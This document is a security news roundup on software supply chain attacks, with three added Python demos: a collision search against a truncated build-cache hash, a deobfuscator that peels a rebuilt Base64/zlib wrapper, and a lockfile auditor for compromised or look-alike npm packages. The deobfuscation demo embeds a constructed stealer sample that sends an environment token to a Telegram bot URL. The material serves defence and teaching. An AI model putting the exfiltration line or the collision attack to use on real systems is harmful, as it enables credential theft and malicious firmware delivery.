A newly documented China-aligned APT group, tracked as PlushDaemon, has been conducting cyber espionage through a supply chain attack on a South Korean VPN provider: the legitimate installer offered for download was swapped for a trojanized one that deploys the group's SlowStepper backdoor. SlowStepper carries a large espionage toolkit whose components are written in C++, Python and Go. Beyond this incident, the group's main initial access vector is hijacking legitimate software update traffic, so any software that fetches updates without verifying signatures is exposed to the same actor.
Several malicious npm packages targeting Solana private keys have been discovered, among them '@async-mutex/mutex', 'dexscreener', 'solana-transaction-toolkit' and 'solana-stable-web-huks'. They rely on typosquatted or look-alike names to pass as legitimate while silently reading wallet private keys and exfiltrating them over Gmail's SMTP servers, an outbound channel that blends in with normal mail traffic and is rarely blocked. Anyone who pulled these packages into a Solana wallet or dApp build should treat the keys that code could reach as compromised and move funds to fresh keys.
The Lazarus Group, a North Korean state-sponsored threat actor, is using LinkedIn to target organizations across multiple sectors. Operators pose as recruiters with fake job offers, use social engineering to establish contact, move the conversation to another platform, and then trick the target into downloading malware disguised as part of the hiring process. Because the lure arrives through a trusted professional network rather than over corporate email, it sidesteps many perimeter and mail-filtering controls; the campaign underscores the need for security policies and employee training that cover business use of social media.
Malicious npm packages impersonating Hardhat plugins are targeting Ethereum developers to steal private keys and other sensitive data. The packages carry names close to those of legitimate Hardhat plugins and have been downloaded more than 1,000 times, enough to backdoor production deployments and cause financial loss. Rather than hard-coding Command and Control (C2) server addresses, the attackers store them in Ethereum smart contracts and have the implants read them from the chain, so the infrastructure can be rotated without republishing the packages and cannot be taken down by a hosting provider. The campaign is a software supply chain attack that exploits trust in package names rather than any flaw in Hardhat itself.
SquareX researchers identified a previously unseen attack abusing the OAuth authorization flow behind Google Chrome extension publishing just days before it was used at scale. In the campaign, extension developers were phished into granting a malicious OAuth application access to their Chrome Web Store accounts, which let the attackers push updated extension versions containing malicious code to existing users without touching the developers' passwords or source repositories. Multiple Chrome extensions were hijacked this way, compromising their users and highlighting the need for tighter controls on extension publishing (reviewing authorized OAuth applications, not just credentials) and proactive detection of such techniques.
A supply chain attack compromised open-source packages belonging to the rspack and vant projects, injecting cryptomining malware into releases published with stolen npm publishing tokens. The affected packages have hundreds of thousands of weekly downloads, so even a short exposure window reaches many build pipelines. For rspack the malicious release was version 1.1.7; vant's affected versions are not listed here. The incident was not a flaw in either project's code but a compromise of its release credentials, which argues for scoped, short-lived publish tokens, mandatory 2FA on maintainer accounts, and vetting of dependency upgrades before they enter a build.
A critical vulnerability (CVE-2024-54143) in OpenWrt's Attended SysUpgrade (ASU) server allowed attackers to serve malicious firmware images to users requesting a custom build. Two flaws combined: the server identified cached builds by a SHA-256 hash of the build request truncated to 12 hexadecimal characters (48 bits), short enough that an attacker could brute-force a request hashing to the same key and poison the cache entry other users would receive, and a command injection in the image build step let the attacker run arbitrary commands on the build server to produce that malicious image. OpenWrt developers patched the ASU server quickly. The case highlights the need to secure the firmware update path end to end, including the server-side build cache, and the reach of supply chain attacks against embedded devices.
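The cost of the truncated-hash flaw is easy to demonstrate. The following Python example is added here and is not OpenWrt's code: it models a build cache keyed by a truncated SHA-256 of the package list (a hypothetical request_key, not the real ASU key derivation) and runs the second-preimage search an attacker would run against a victim's key. The truncation length is a parameter, so the demo uses 4 hex characters to finish in seconds in pure Python and reports the expected work for the 12-character truncation the real server used. The victim package list is constructed.

```python
import hashlib
import itertools

def request_key(packages: list[str], trunc_hex: int) -> str:
    """Hypothetical cache key for a build request: SHA-256 of the canonical
    package list, truncated to trunc_hex hex characters. This mirrors the
    weakness behind CVE-2024-54143 (12 characters, 48 bits) but is not
    OpenWrt's own implementation."""
    canonical = "\n".join(sorted(packages)).encode()
    return hashlib.sha256(canonical).hexdigest()[:trunc_hex]

def expected_trials(trunc_hex: int) -> int:
    """Expected number of hashes to hit one given truncated key by brute force."""
    return 16 ** trunc_hex

def forge_request(target_key: str, base: list[str]) -> tuple[list[str], int]:
    """Second-preimage search: vary an attacker-controlled package name until the
    attacker's request hashes to the victim's cache key. In the real attack the
    forged request also carried the command injection that produced the malicious
    image stored under that key. Returns (forged_package_list, trials_used)."""
    trunc = len(target_key)
    for n in itertools.count(1):
        forged = list(base) + [f"evil-pkg-{n}"]  # attacker-chosen variation
        if request_key(forged, trunc) == target_key:
            return forged, n

if __name__ == "__main__":
    victim = ["luci", "wpad-basic-mbedtls"]   # constructed victim request
    key = request_key(victim, 4)              # 16-bit key: seconds in Python
    forged, trials = forge_request(key, victim)
    print(f"victim key {key} forged after {trials} trials using {forged[-1]}")
    print(f"12 hex chars: ~{expected_trials(12):.3g} trials (GPU-feasible); "
          f"full digest: ~{expected_trials(64):.3g} (infeasible)")
```

The fix is the obvious one: key the cache on the full digest, or better, on a hash of the whole canonicalized request including the target and version, and never let a request parameter reach a shell. Truncating a hash "for readability" turns a 256-bit identifier into whatever the truncation leaves.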
A malicious PyPI package, 'aiocpa', posing as a legitimate cryptocurrency payment API client, was used to steal cryptocurrency wallet credentials. Instead of typosquatting an existing project, the attackers published and maintained their own legitimate-looking package and only later slipped the malicious payload into a new release. That payload was hidden under repeated layers of Base64 encoding and zlib compression, so the Telegram bot endpoint it exfiltrated data to never appeared in the source as plain text. A clean package history is therefore no guarantee; the risk is inherent to consuming third-party code, and new releases of even established packages warrant review.
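Layered Base64-plus-zlib wrapping defeats a plain grep of the package source, but it is trivial to peel statically. The Python example below is added here and is not the malware's code or ReversingLabs' tooling: wrap() rebuilds the nesting pattern (an exec() around a zlib-compressed, Base64-encoded next stage, repeated) on a constructed stand-in payload, unwrap() peels the layers without executing anything, and scan() shows that the exfiltration indicator is invisible in the wrapped blob and visible in the recovered source. The wrapper regex and the indicator list are assumptions for the demo.

```python
import base64
import re
import zlib

# One stage of the wrapper: exec(zlib.decompress(base64.b64decode(b'...')))
STAGE_RE = re.compile(
    rb"exec\(zlib\.decompress\(base64\.b64decode\(b'([A-Za-z0-9+/=]+)'\)\)\)"
)

# Strings a reviewer would grep for once the code is in the clear (assumed list).
INDICATORS = {
    "telegram-bot-exfil": re.compile(rb"api\.telegram\.org/bot"),
    "env-secret-read": re.compile(rb"os\.environ"),
    "dynamic-exec": re.compile(rb"\bexec\("),
}

# Constructed stand-in for the stealer; it is analysed as bytes, never executed.
SAMPLE_PAYLOAD = b"""import os, urllib.request
token = os.environ.get("CRYPTOPAY_TOKEN", "")
urllib.request.urlopen("https://api.telegram.org/bot000:FAKE/sendMessage?text=" + token)
"""

def wrap(source: bytes, layers: int) -> bytes:
    """Rebuild the obfuscation: compress, Base64-encode, embed in an exec()
    wrapper, and repeat `layers` times so each stage hides the next."""
    stage = source
    for _ in range(layers):
        blob = base64.b64encode(zlib.compress(stage))
        stage = b"exec(zlib.decompress(base64.b64decode(b'" + blob + b"')))"
    return stage

def unwrap(stage: bytes, max_layers: int = 200) -> tuple[bytes, int]:
    """Statically peel wrapper layers. Returns (innermost_source, layers_removed).
    max_layers guards against a blob crafted to loop forever."""
    layers = 0
    while layers < max_layers:
        m = STAGE_RE.search(stage)
        if not m:
            break
        stage = zlib.decompress(base64.b64decode(m.group(1)))
        layers += 1
    return stage, layers

def scan(source: bytes) -> list[str]:
    """Names of indicators present in the given bytes."""
    return [name for name, pat in INDICATORS.items() if pat.search(source)]

if __name__ == "__main__":
    blob = wrap(SAMPLE_PAYLOAD, 5)
    print("wrapped blob indicators:", scan(blob))        # only dynamic-exec
    src, n = unwrap(blob)
    print(f"peeled {n} layers; recovered indicators:", scan(src))
```

Real samples vary the wrapper (different import aliases, reversed strings, marshal instead of zlib), so in practice the regex is the part you extend; the loop, the layer cap, and the rule of never calling exec() on untrusted stages stay the same.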
A supply chain attack compromised versions 1.95.6 and 1.95.7 of the @solana/web3.js npm library, the core JavaScript client for Solana blockchain applications. Malicious code added to those versions harvested private keys and sent them to an attacker-controlled server, enabling cryptocurrency theft from applications and wallets that bundled the affected releases during the window they were available. Developers should move off the compromised versions immediately, by upgrading to 1.95.8 or later or pinning a release before 1.95.6, rotate any keys that code built on the affected versions could have loaded, and audit lockfiles to confirm neither bad version is still resolved anywhere in the dependency tree.
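The npm incidents above share two detectable patterns: a known-bad version of a legitimate package (@solana/web3.js 1.95.6/1.95.7, rspack 1.1.7) and a look-alike name standing in for a popular one ('@async-mutex/mutex' for async-mutex, the fake Hardhat plugins). The Python example below is added here and is not any of the projects' tooling: it walks a package-lock.json (lockfileVersion 3 layout) and flags both. The blocklist is a sample built from the items on this page, vant's versions are omitted because they are not listed here, the rspack package names '@rspack/core' and '@rspack/cli' are assumed, the "popular names" allowlist is a stand-in for an organisation's own, and the lockfile, including the package 'hardhatt', is constructed for the demo.

```python
import json

# Known-bad releases from the incidents above (sample blocklist, not exhaustive).
KNOWN_BAD = {
    "@solana/web3.js": {"1.95.6", "1.95.7"},
    "@rspack/core": {"1.1.7"},   # assumed package name for the rspack release
    "@rspack/cli": {"1.1.7"},
}

# Packages attackers imitate; in practice use your organisation's allowlist.
POPULAR = ["async-mutex", "hardhat", "@solana/web3.js", "lodash"]

# Constructed package-lock.json for the demo; 'hardhatt' is a made-up name.
SAMPLE_LOCK = json.dumps({
    "name": "demo-app", "lockfileVersion": 3,
    "packages": {
        "": {"name": "demo-app", "version": "1.0.0"},
        "node_modules/@solana/web3.js": {"version": "1.95.7"},
        "node_modules/@async-mutex/mutex": {"version": "0.5.0"},
        "node_modules/hardhatt": {"version": "2.22.0"},
        "node_modules/@rspack/core": {"version": "1.1.8"},
        "node_modules/lodash": {"version": "4.17.21"},
    },
})

def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance, used to catch one- or two-character typosquats."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def lookalike(name: str):
    """Return the popular package `name` imitates, or None. Catches both
    near-miss spellings and the scope trick (@async-mutex/mutex vs async-mutex)."""
    if name in POPULAR:
        return None
    scope = name[1:].split("/", 1)[0] if name.startswith("@") else None
    for p in POPULAR:
        if scope == p or edit_distance(name, p) <= 2:
            return p
    return None

def audit(lock: dict) -> list[tuple[str, str, str]]:
    """Return (name, version, reason) for every suspicious entry in the lockfile."""
    findings = []
    for path, meta in lock.get("packages", {}).items():
        if not path:
            continue  # the root project entry
        name = path.rsplit("node_modules/", 1)[1]  # handles nested node_modules
        version = meta.get("version", "")
        if version in KNOWN_BAD.get(name, ()):
            findings.append((name, version, "known-compromised version"))
        target = lookalike(name)
        if target:
            findings.append((name, version, f"look-alike of {target}"))
    return findings

if __name__ == "__main__":
    for name, version, reason in audit(json.loads(SAMPLE_LOCK)):
        print(f"{name}@{version}: {reason}")
```

Run it against the real lockfile with `audit(json.load(open("package-lock.json")))`. The version check is exact and cheap, so it belongs in CI; the look-alike check produces judgement calls and is better surfaced in review than used to fail a build.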